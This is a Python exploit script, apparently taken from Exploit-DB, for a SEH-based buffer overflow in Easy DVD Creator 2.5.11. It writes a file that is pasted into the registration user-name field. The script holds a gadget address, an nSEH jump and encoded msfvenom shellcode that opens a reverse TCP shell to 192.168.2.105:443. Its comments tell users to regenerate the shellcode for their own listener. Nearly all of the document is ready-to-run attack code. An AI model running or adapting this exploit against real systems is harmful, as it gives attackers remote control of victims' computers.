Easy DVD Creator 2.5.11 – Local Buffer Overflow (SEH)

  • 作者: tr0ubl3m4k3r
    日期: 2017-08-26
  • 来源:https://www.exploit-db.com/exploits/42565/
  • #!/usr/bin/python
    
    ###############################################################################
    # Exploit Title: Easy DVD Creator 2.5.11 - Buffer Overflow (Windows 10 64bit, SEH)
    # Date: 26-08-2017
    # Exploit Author: tr0ubl3m4k3r
    # Vulnerable Software: Easy DVD Creator
    # Vendor Homepage: http://www.divxtodvd.net/
    # Version: 2.5.11
    # Software Link: http://www.divxtodvd.net/easy_dvd_creator.exe
    # Tested On: Windows 10 64bit
    #
    # Credit to Muhann4d for discovering the PoC (41911).
    #
    # To reproduce the exploit:
    #	1. Run this script; it writes exploit.txt into the current directory.
    #	2. Click Register.
    #	3. In the "Enter User Name" field, paste the content of exploit.txt.
    #	   The file holds raw bytes above 0x7f (the encoded shellcode), so copy it
    #	   with a tool that does not re-encode, strip or line-wrap them.
    #
    ##############################################################################
    
    
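    import struct

    # Layout of the string pasted into the "Enter User Name" field (byte offsets):
    #   0..987    filler ("A")
    #   988..991  nSEH   (short jmp over the SEH record)
    #   992..995  SEH    (pop/pop/ret gadget address, little-endian)
    #   996..1011 NOP sled
    #   1012..    shellcode, then "D" padding so shellcode + padding is always TAIL_LEN
    FILLER_LEN = 988
    TAIL_LEN = 1000
    OUTPUT_FILE = "exploit.txt"

    # Bytes the target field cannot carry; msfvenom was run with -b on the same set,
    # and build_payload() re-checks the finished string against it.
    BAD_CHARS = (b"\x00", b"\x0a", b"\x0d")

    # nSEH: EB 09 = jmp short +9, which lands inside the NOP sled after the SEH
    # record; the two trailing NOPs keep the record 4 bytes wide.
    nSEH = b"\xeb\x09\x90\x90"

    # 0x10037859 : pop ebx # pop eax # ret | ascii {PAGE_EXECUTE_READ} [SkinMagic.dll]
    # ASLR: False, Rebase: False, SafeSEH: False, OS: False, v1.8.1.1
    # NOTE(review): the original mona output lists the module path as
    # C:\Program Files (x86)\Easy MOV Converter\SkinMagic.dll -- a different product
    # from the same vendor. Confirm that Easy DVD Creator loads SkinMagic.dll
    # v1.8.1.1 at the same base before relying on this gadget address.
    SEH_ADDR = 0x10037859
    SEH = struct.pack("<I", SEH_ADDR)   # little-endian -> b"\x59\x78\x03\x10"

    junk = b"\x90" * 16

    # msfvenom -p windows/shell_reverse_tcp LHOST=192.168.2.105 LPORT=443
    # -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d"
    # WARNING: this is a reverse shell to the original author's lab address
    # (192.168.2.105:443). Regenerate it for your own listener before use; the
    # padding below adapts to the new length automatically.
    SHELLCODE = (b"\xdb\xd5\xbf\xd7\xf8\x35\x95\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1"
    b"\x52\x83\xc2\x04\x31\x7a\x13\x03\xad\xeb\xd7\x60\xad\xe4\x9a"
    b"\x8b\x4d\xf5\xfa\x02\xa8\xc4\x3a\x70\xb9\x77\x8b\xf2\xef\x7b"
    b"\x60\x56\x1b\x0f\x04\x7f\x2c\xb8\xa3\x59\x03\x39\x9f\x9a\x02"
    b"\xb9\xe2\xce\xe4\x80\x2c\x03\xe5\xc5\x51\xee\xb7\x9e\x1e\x5d"
    b"\x27\xaa\x6b\x5e\xcc\xe0\x7a\xe6\x31\xb0\x7d\xc7\xe4\xca\x27"
    b"\xc7\x07\x1e\x5c\x4e\x1f\x43\x59\x18\x94\xb7\x15\x9b\x7c\x86"
    b"\xd6\x30\x41\x26\x25\x48\x86\x81\xd6\x3f\xfe\xf1\x6b\x38\xc5"
    b"\x88\xb7\xcd\xdd\x2b\x33\x75\x39\xcd\x90\xe0\xca\xc1\x5d\x66"
    b"\x94\xc5\x60\xab\xaf\xf2\xe9\x4a\x7f\x73\xa9\x68\x5b\xdf\x69"
    b"\x10\xfa\x85\xdc\x2d\x1c\x66\x80\x8b\x57\x8b\xd5\xa1\x3a\xc4"
    b"\x1a\x88\xc4\x14\x35\x9b\xb7\x26\x9a\x37\x5f\x0b\x53\x9e\x98"
    b"\x6c\x4e\x66\x36\x93\x71\x97\x1f\x50\x25\xc7\x37\x71\x46\x8c"
    b"\xc7\x7e\x93\x03\x97\xd0\x4c\xe4\x47\x91\x3c\x8c\x8d\x1e\x62"
    b"\xac\xae\xf4\x0b\x47\x55\x9f\xf3\x30\x57\x36\x9c\x42\x57\xc9"
    b"\xe7\xca\xb1\xa3\x07\x9b\x6a\x5c\xb1\x86\xe0\xfd\x3e\x1d\x8d"
    b"\x3e\xb4\x92\x72\xf0\x3d\xde\x60\x65\xce\x95\xda\x20\xd1\x03"
    b"\x72\xae\x40\xc8\x82\xb9\x78\x47\xd5\xee\x4f\x9e\xb3\x02\xe9"
    b"\x08\xa1\xde\x6f\x72\x61\x05\x4c\x7d\x68\xc8\xe8\x59\x7a\x14"
    b"\xf0\xe5\x2e\xc8\xa7\xb3\x98\xae\x11\x72\x72\x79\xcd\xdc\x12"
    b"\xfc\x3d\xdf\x64\x01\x68\xa9\x88\xb0\xc5\xec\xb7\x7d\x82\xf8"
    b"\xc0\x63\x32\x06\x1b\x20\x42\x4d\x01\x01\xcb\x08\xd0\x13\x96"
    b"\xaa\x0f\x57\xaf\x28\xa5\x28\x54\x30\xcc\x2d\x10\xf6\x3d\x5c"
    b"\x09\x93\x41\xf3\x2a\xb6")


    def build_payload(shellcode=SHELLCODE):
        """Return the complete crash string as bytes.

        The total length is fixed at FILLER_LEN + 24 + TAIL_LEN regardless of the
        shellcode size, so a regenerated shellcode keeps the same SEH overwrite
        offset (the original hard-coded the padding as 1000 - 351).

        Args:
            shellcode: raw x86 shellcode, already free of BAD_CHARS.

        Raises:
            ValueError: if the shellcode is longer than TAIL_LEN, or if the
                finished payload contains a byte from BAD_CHARS (which would be
                mangled or truncated when pasted into the text field).
        """
        if len(shellcode) > TAIL_LEN:
            raise ValueError("shellcode is %d bytes, maximum is %d"
                             % (len(shellcode), TAIL_LEN))
        padding = b"\x44" * (TAIL_LEN - len(shellcode))
        payload = b"\x41" * FILLER_LEN + nSEH + SEH + junk + shellcode + padding
        for bad in BAD_CHARS:
            if bad in payload:
                raise ValueError("payload contains forbidden byte %r" % (bad,))
        return payload


    def write_payload(path=OUTPUT_FILE):
        """Write build_payload() to *path* and return the number of bytes written.

        The file is opened in binary mode on purpose: the original text-mode
        write would, under Python 3, UTF-8-encode every byte above 0x7f and
        shift every offset in the payload.
        """
        payload = build_payload()
        with open(path, "wb") as out:
            out.write(payload)
        return len(payload)


    if __name__ == "__main__":
        write_payload()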